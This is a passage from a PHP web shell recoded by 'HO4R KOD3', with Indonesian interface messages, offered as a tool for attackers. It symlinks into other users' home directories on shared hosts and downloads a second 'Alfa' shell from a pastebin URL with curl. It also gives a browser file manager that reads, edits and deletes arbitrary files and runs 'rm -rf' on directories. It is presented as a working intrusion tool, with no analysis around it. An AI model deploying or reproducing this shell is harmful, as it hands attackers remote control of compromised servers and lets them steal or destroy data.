2060. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2061. continue;
2062. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2063. <td align=center><font class=txt>" . $matches . "</td>";
2064. echo "<td align=center><font class=txt><a href=$full/kod3_SYMLINK/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2065. $dcount++;}
2066. fclose($file);
2067. echo "</table></div></center>";unlink("test.txt");
2068. } else
2069. echo "<center><font size=3>Gabisa buat Symlink, Jancok!</font></center>";
2070. }
2071. }
2072. }
2073.  
2074. elseif($_GET['do'] == 'alfa') {
2075. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2076. function adminer($url, $isi) {
2077. $fp = fopen($isi, "w");
2078. $ch = curl_init();
2079. curl_setopt($ch, CURLOPT_URL, $url);
2080. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2081. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2082. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2083. curl_setopt($ch, CURLOPT_FILE, $fp);
2084. return curl_exec($ch);
2085. curl_close($ch);
2086. fclose($fp);
2087. ob_flush();
2088. flush();
2089. }
2090. if(file_exists('alfa.php')) {
2091. echo "<center><font color=green><a href='$full/alfa.php' target='_blank'>-> Link to Alfa Shell <-</a></font></center>";
2092. } else {
2093. if(adminer("https://pastebin.com/raw/EqVa7Lks","alfa.php")) {
2094. echo "<center><font color=green><a href='$full/alfa.php' target='_blank'>->Link to Alfa Shell<-</a></font></center>";
2095. } else {
2096. echo "<center><font color=red>gagal buat file alfa.php</font></center>";
2097. }
2098. }
2099. }
2100.  
2101. elseif($_GET['act'] == 'newfile') {
2102. if($_POST['new_save_file']) {
2103. $newfile = htmlspecialchars($_POST['newfile']);
2104. $fopen = fopen($newfile, "a+");
2105. if($fopen) {
2106. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2107. } else {
2108. $act = "<font color=red>permission denied</font>";
2109. }
2110. }
2111. echo $act;
2112. echo "<form method='post'>
2113. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2114. <input type='submit' name='new_save_file' value='Submit'>
2115. </form>";
2116. } elseif($_GET['act'] == 'newfolder') {
2117. if($_POST['new_save_folder']) {
2118. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2119. if(!mkdir($new_folder)) {
2120. $act = "<font color=red>permission denied</font>";
2121. } else {
2122. $act = "<script>window.location='?dir=".$dir."';</script>";
2123. }
2124. }
2125. echo $act;
2126. echo "<form method='post'>
2127. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2128. <input type='submit' name='new_save_folder' value='Submit'>
2129. </form>";
2130. } elseif($_GET['act'] == 'rename_dir') {
2131. if($_POST['dir_rename']) {
2132. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2133. if($dir_rename) {
2134. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2135. } else {
2136. $act = "<font color=red>permission denied</font>";
2137. }
2138. echo "".$act."<br>";
2139. }
2140. echo "<form method='post'>
2141. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2142. <input type='submit' name='dir_rename' value='rename'>
2143. </form>";
2144. } elseif($_GET['act'] == 'delete_dir') {
2145. if(is_dir($dir)) {
2146. if(is_writable($dir)) {
2147. @rmdir($dir);
2148. @exe("rm -rf $dir");
2149. @exe("rmdir /s /q $dir");
2150. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2151. } else {
2152. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2153. }
2154. }
2155. echo $act;
2156. } elseif($_GET['act'] == 'view') {
2157. echo "Filename: <font color=green>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2158. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2159. } elseif($_GET['act'] == 'edit') {
2160. if($_POST['save']) {
2161. $save = file_put_contents($_GET['file'], $_POST['src']);
2162. if($save) {
2163. $act = "<font color=green>Saved!</font>";
2164. } else {
2165. $act = "<font color=red>permission denied</font>";
2166. }
2167. echo "".$act."<br>";
2168. }
2169. echo "Filename: <font color=green>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2170. echo "<form method='post'>
2171. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2172. <input type='submit' value='Save' name='save' style='width: 500px;'>
2173. </form>";
2174. } elseif($_GET['act'] == 'rename') {
2175. if($_POST['do_rename']) {
2176. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2177. if($rename) {
2178. $act = "<script>window.location='?dir=".$dir."';</script>";
2179. } else {
2180. $act = "<font color=red>permission denied</font>";
2181. }
2182. echo "".$act."<br>";
2183. }
2184. echo "Filename: <font color=green>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2185. echo "<form method='post'>
2186. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2187. <input type='submit' name='do_rename' value='rename'>
2188. </form>";
2189. } elseif($_GET['act'] == 'delete') {
2190. $delete = unlink($_GET['file']);
2191. if($delete) {
2192. $act = "<script>window.location='?dir=".$dir."';</script>";
2193. } else {
2194. $act = "<font color=red>permission denied</font>";
2195. }
2196. echo $act;
2197. } else {
2198. if(is_dir($dir) === true) {
2199. if(!is_readable($dir)) {
2200. echo "<font color=red>can't open directory. ( not readable )</font>";
2201. } else {
2202. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2203. <tr>
2204. <th class="th_home"><center>NAME</center></th>
2205. <th class="th_home"><center>TYPE</center></th>
2206. <th class="th_home"><center>SIZE</center></th>
2207. <th class="th_home"><center>LAST MODIFIED</center></th>
2208. <th class="th_home"><center>GROUP</center></th>
2209. <th class="th_home"><center>PERMISSION</center></th>
2210. <th class="th_home"><center>ACTION</center></th>
2211. </tr>';
2212. $scandir = scandir($dir);
2213. foreach($scandir as $dirx) {
2214. $dtype = filetype("$dir/$dirx");
2215. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2216. if(function_exists('posix_getpwuid')) {
2217. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2218. $downer = $downer['name'];
2219. } else {
2220. //$downer = $uid;
2221. $downer = fileowner("$dir/$dirx");
2222. }
2223. if(function_exists('posix_getgrgid')) {
2224. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2225. $dgrp = $dgrp['name'];
2226. } else {
2227. $dgrp = filegroup("$dir/$dirx");
2228. }
2229. if(!is_dir("$dir/$dirx")) continue;
2230. if($dirx === '..') {
2231. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2232. } elseif($dirx === '.') {
2233. $href = "<a href='?dir=$dir'>$dirx</a>";
2234. } else {
2235. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2236. }
2237. if($dirx === '.' || $dirx === '..') {
2238. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2239. } else {
2240. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2241. }
2242. echo "<tr>";
2243. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2244. echo "<td class='td_home'><center>$dtype</center></td>";
2245. echo "<td class='td_home'><center>-</center></th></td>";
2246. echo "<td class='td_home'><center>$dtime</center></td>";
2247. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2248. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2249. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
2250. echo "</tr>";
2251. }
2252. }
2253. } else {
2254. echo "<font color=red>can't open directory.</font>";
2255. }
2256. foreach($scandir as $file) {
2257. $ftype = filetype("$dir/$file");
2258. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2259. $size = filesize("$dir/$file")/1024;
2260. $size = round($size,3);
2261. if(function_exists('posix_getpwuid')) {
2262. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2263. $fowner = $fowner['name'];
2264. } else {
2265. //$downer = $uid;
2266. $fowner = fileowner("$dir/$file");
2267. }
2268. if(function_exists('posix_getgrgid')) {
2269. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2270. $fgrp = $fgrp['name'];
2271. } else {
2272. $fgrp = filegroup("$dir/$file");
2273. }
2274. if($size > 1024) {
2275. $size = round($size/1024,2). 'MB';
2276. } else {
2277. $size = $size. 'KB';
2278. }
2279. if(!is_file("$dir/$file")) continue;
2280. echo "<tr>";
2281. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2282. echo "<td class='td_home'><center>$ftype</center></td>";
2283. echo "<td class='td_home'><center>$size</center></td>";
2284. echo "<td class='td_home'><center>$ftime</center></td>";
2285. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2286. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2287. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2288. echo "</tr>";
2289. }
2290. echo "</table>";
2291. if(!is_readable($dir)) {
2292. //
2293. } else {
2294. }
2295.  
2296. echo "<center> ".date("")." <font color=green><br>RECODED BY HO4R KOD3</font></a></center>";
2297. }
2298. ?>
2299. </html>